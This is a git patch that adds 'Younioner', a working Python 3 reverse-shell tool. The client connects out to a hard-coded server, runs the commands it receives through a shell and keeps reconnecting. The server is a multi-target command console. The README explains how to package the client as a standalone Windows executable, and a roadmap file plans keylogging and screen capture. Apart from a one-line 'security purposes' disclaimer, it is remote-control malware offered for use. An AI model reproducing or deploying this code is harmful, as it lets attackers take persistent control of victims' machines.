From f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b Mon Sep 17 00:00:00 2001 From: xl7dev Date: Tue, 11 Apr 2017 18:45:56 +0800 Subject: [PATCH] add python3 reverse shell --- python/python3/Client.py | 77 ++++++++++++++ python/python3/README.md | 53 ++++++++++ python/python3/Server.py | 220 +++++++++++++++++++++++++++++++++++++++ python/python3/about.txt | 19 ++++ python/python3/setup.py | 3 + 5 files changed, 372 insertions(+) create mode 100644 python/python3/Client.py create mode 100644 python/python3/README.md create mode 100644 python/python3/Server.py create mode 100644 python/python3/about.txt create mode 100644 python/python3/setup.py diff --git a/python/python3/Client.py b/python/python3/Client.py new file mode 100644 index 0000000..7b78d51 --- /dev/null +++ b/python/python3/Client.py @@ -0,0 +1,77 @@ +from socket import * +import subprocess +import os +import time +import sys + +ip = '192.168.1.88' # server ip, which you want to connect to +port = 4343 # the port needs to be the same as server.py port in order to connect with server + +class Client: + def __init__(self, _host, _port=3434): + self.host = _host + self.port = _port + self.s = None + + self.launch() + + # run younioner + def launch(self): + try: + self.open_socket() + self.receive_commands() + self.chat() + + except error as e: + time.sleep(6) + self.launch() + + # will create the socket + def open_socket(self): + try: + self.s = socket(AF_INET, SOCK_STREAM) + self.s.connect((self.host, self.port)) + + except: + time.sleep(5) + self.open_socket() + + # receive commands from the Server + def receive_commands(self): + try: + while True: + data = self.s.recv(1024) + striped_data = data[:].strip().decode("utf-8") + + if striped_data[:2] == 'cd': + os.chdir(striped_data[3:]) + + if len(data) > 0: + try: + cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stderr=subprocess.PIPE, + stdout=subprocess.PIPE, stdin=subprocess.PIPE) + result = str(cmd.stdout.read() + cmd.stderr.read(), "utf-8") + + self.s.send(str.encode(result + str(os.getcwd()) + " > ")) + except: + result = "Command not recognized \n" + self.s.send(str.encode(result + str(os.getcwd()) + " > ")) + + + # this condition will work when the user quit server.py + if striped_data == "end-of-session": + time.sleep(2) + self.s.close() + sys.exit(0) + os._exit(0) + exit(0) + quit(0) + + self.s.close() + + except: + time.sleep(5) + self.receive_commands() + +if __name__ == '__main__': + c = Client(ip, port) diff --git a/python/python3/README.md b/python/python3/README.md new file mode 100644 index 0000000..cf87b4e --- /dev/null +++ b/python/python3/README.md @@ -0,0 +1,53 @@ +# Younioner +Younioner is **multipale client** reverse shell created by Ayoub Ouakkaha, which is now under development + +## How to use it +once you download the project(click on download zip button ) +You can run this directly as python3 script +* **windows** +just write the command below in command prompt +`python Server.py` +to run Client just change Server.py with Client.py module: +`python Client.py` + +* **Linux** +you can run this also inside linux OS using bellow commands +`python3 Server.py` +to run Client just change Server.py with Client.py module: +`python3 Client.py` + +## Make it Executable: +instead of running python client.py every time we want to run the client module you can do this inside **windows** Using Py2Exe Library, after bellow proccess you will have .exe ready to run in anywhere without python, just follow me + +1. download and install the library using this link [sourceforge](https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/) + +2. with in command Prompt and inside the directory which you download the Younioner into run this command: +`python setup.py install` +3. that's it now you will be able to see dist folder just open it and you find **Client.exe** executable(its the one) + +To Do this Linux i only know one library that could get the job done which is **PyInstaller**, you can find more about this process using this link **[pythonhosted's website](https://pythonhosted.org/PyInstaller/)** + +## Younioner Features +Younioner introduce tons of awesome Features, include: + +1. **Multiple Client Support:** this is really important when you're Dealing with all of targets, this feature allow you to take control of each connected target in individual. +2. **Easy interface:** up to this moment **Younioner** project uses terminal or command prompt in windows, we plan to switch to GUI(probably in incoming releases), anyway interface is really simple +3. **Easy commands**: yes no more stupid and complicated commands, **Younioner** offers you easy and realistic commands +4. **All Platforms :** Younioner support all different platforms which includes Mobile(tested on android), Windows, Linux, OS X... +5. **Under Developpement:** Younioner is under developpement which means a lot features are coming soon + +### so what is it Reverse Shell +A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved. + +### get evolved with the project +we plan to make Younioner a great project, but this won't happen without a cooperation from other developers. +so feel free to join us.. + +### Important +this project was made for security purposes. +you have no right to use this in any device other than yours + +### Contact Me +You can use this email to reach me **ayoub.ouakkaha@gmail.com** + +**MADE WITH PASSION AND LOVE** diff --git a/python/python3/Server.py b/python/python3/Server.py new file mode 100644 index 0000000..3361c6e --- /dev/null +++ b/python/python3/Server.py @@ -0,0 +1,220 @@ +from socket import * +import time +import threading +import sys +import os +from queue import Queue + +queue = Queue() +host = '192.168.1.88' # your computer ip +port = 4343 + + +class Server: + def __init__(self, _host, _port=3434, _max_client=20): + + # Variables used in this class are here + self.host = _host + self.port = _port + self.max_client = _max_client # max amount of expected connections + + # once any client connected + self.all_connection = [] # the connections will be stored here. + self.all_addresses = [] # the addresses will be stored here. + + # create socket + def open_socket(self): + try: + self.s = socket(AF_INET, SOCK_STREAM) + self.s.bind((self.host, self.port)) + + logo = "__ __ _ ____ \n" \ + "\ \ / /__ _ _ _ __ (_) ___ _ __ ___| _ \ \n" \ + " \ V / _ \| | | | '_ \| |/ _ \| '_ \ / _ \ |_) | \n" \ + " | | (_) | |_| | | | | | (_) | | | | __/ _ < \n" \ + " |_|\___/ \__,_|_| |_|_|\___/|_| |_|\___|_| \_\ \n" + + print("\n\tWelcome to Younioner V1.1") + print(logo) + print('Created by Ayoub Ouakkaha, please visit our website www.ouakkaha.com') + print('\ncontact us at contact@ouakkaha.com, type help to display available commands.') + + # listen for one connection :) + self.s.listen(self.max_client) + + except error as e: + print("** Oops Something went wrong error code ", e) + time.sleep(5) # wait for 5s and try again + self.open_socket() + + # accept incoming connection + def accept_connection(self): + for c in self.all_connection: # close the connection list + c.close() + del self.all_connection[:] # clean connection list + del self.all_addresses[:] # clean addresses list + + while True: + try: + conn, address = self.s.accept() + conn.setblocking(1) + self.all_connection.append(conn) + self.all_addresses.append(address) + print("\n* new Connection has been established from {} on {}".format(address[0], address[1])) + print("\nYounioner> ", end="") + except error as e: + print("something went wrong while accepting new connection\n error code: {} \n".format(str(e))) + + # Interactive shell for sending command remotely + def start_younioner(self): + + while True: + cmd = str(input("Younioner> ")) + cmd = cmd.lower() + cmd_stripped = cmd.strip() + + if cmd.strip() == 'list': + self.list_connections() + continue + elif cmd.strip() == "help": + self.displayHelp() + + elif cmd_stripped.startswith("select"): # check command start with `select` word + conn = self.get_target(cmd) + if conn is not None: + self.send_commands(conn) + elif cmd_stripped == "quit": + self.exit() + + else: + print("{} Command not recognized..".format(cmd)) + + # Display the help menu + def displayHelp(self): + """Display The help menu""" + help = "\nthis section will help to understand the basic commands: " \ + "\n\nlist............ It will list availabel connection..Usage(just type : `list`)"\ + "\n\nselect.......... used to select a connection to target.. the target number needs be availabel on list section Usage(select 1) or change the number 1 to the target ID"\ + "\n\nquit............ used to close the current connection .. or if you don't have one it will close the script"\ + "\n\nhelp............ as you might guess, it will print the help Menu, which you're looking to now.:)"\ + "\n\nend-of-session.. this is really advance command..this command will delet your trace from the target command, for example it will delet the current running script on the target command which is(Client) "\ + "\n\nIf you liked Our app and you want to help us for providing more and more.. please contact us at contact@ouakkaha.com or visit my site www.ouakkaha.com\nanyway thanks for using my app, be sure to have a greate day :)" + + + print(help) + # Exit Reverse Shell + def exit(self): + for c in self.all_connection: + try: + c.send(str.encode("end-of-session")) + c.shutdown(2) + c.close() + except Exception as e: + print('Could not close connection ' + str(e)) + + self.s.close() + print("\n Good By, please have a nice day :) ") + + # this will be over need but believe me, some times the module refuse to exit.. + # this is why i try each of this method cause at the end one of theme should work.. + os._exit(0) + sys.exit() + quit(0) + exit(0) + + + # this will display all current connection + def list_connections(self): + rs = '' + for i, conn in enumerate(self.all_connection): # Enumerate will count number of loop + try: # we will test if conn are working.. + conn.send(str.encode(' ')) # send blank to test if conn is working., + conn.recv(20240) + except: # this will ocure if conn is null + del self.all_connection[i] + del self.all_addresses[i] + continue # go to next loop do not execut the next line.. + rs += str(i) + '\t' + str(self.all_addresses[i][0]) + '\t' + str(self.all_addresses[i][1]) + '\n' + + + print("Currently Available Targets") + print("ID\tIP\t\t\t\tPORT\n" + rs) + + # Select a target client + def get_target(self, cmd): + target = cmd.replace('select ', '') + try: + target = int(target) + except: + print("Target index should be integer.") + return None + try: + conn = self.all_connection[target] + except: + print("Not Invalid Selection..") + return None + + print("You are now connected to", self.all_addresses[target][0]) + print("Younioner.{} >> ".format(self.all_addresses[target][0]), end="") + return conn + + # Connect with the target + def send_commands(self, conn): + while True: + try: + cmd = str(input()) + + if len(cmd) > 0: + conn.send(str.encode(cmd)) + client_response = str(conn.recv(20480), "utf-8") + print(client_response, end="") + + # confirm quit + if cmd == "quit": + print("\nAre you sure, the socket will be closed for this moment..") + confirm = str.upper(input("\t N / y >> ")) + if confirm == "Y": + break + + except: + print("[!] Connection was lost ") + break + +# Setting up threads +def setup_threads(): + server = Server('', port) + for _ in range(2): + t = threading.Thread(target=work, args=(server,)) + t.daemon = True # It means when the script got closed the thread also will exit from process + t.start() + return + + +# Do the next job in the queue(1: handles connection, other sends commands and get response back) +def work(server): + while True: + x = queue.get() + if x == 0: # 0: handles connection + server.open_socket() + server.accept_connection() + if x == 1: # 1: sends commands to target machine + server.start_younioner() + queue.task_done() # [Done] jobs are done with success + return + + +# Each list item is a new job +def create_jobs(): + for x in range(2): + queue.put(x) + queue.join() + return + +# the main function +def main(): + setup_threads() + create_jobs() + + +if __name__ == '__main__': + main() diff --git a/python/python3/about.txt b/python/python3/about.txt new file mode 100644 index 0000000..6babc4a --- /dev/null +++ b/python/python3/about.txt @@ -0,0 +1,19 @@ + +\ \ / /__ _ _ _ __ (_) ___ _ __ ___| _ \ + \ V / _ \| | | | '_ \| |/ _ \| '_ \ / _ \ |_) | + | | (_) | |_| | | | | | (_) | | | | __/ _ < + |_|\___/ \__,_|_| |_|_|\___/|_| |_|\___|_| \_\ + + +Younioner Version 1.1 - created by Ayoub Ouakkaha. +the ide behind the project is to make a simple tool let you take controle over your devices. +up to now Younioner project is just a reverse shell, but i hope i could add this features in incoming release + * G.U.I support : yes i plan to make the project support graphical user interface.. + * Key Capture: yes younioner will include the key capture feature probably this feature will work only in windows.. but we will sya :) + * Screen Capture + * Executable Client: you'll have the option to genrate either client.py or client.exe + +please help us to develope the next version of Younioner 1.2 +for more contact me on : +ayoub.ouakkaha@gmail.com +thanks in advance. diff --git a/python/python3/setup.py b/python/python3/setup.py new file mode 100644 index 0000000..c07f4e7 --- /dev/null +++ b/python/python3/setup.py @@ -0,0 +1,3 @@ +from distutils.core import setup + +setup(console=['Client.py'])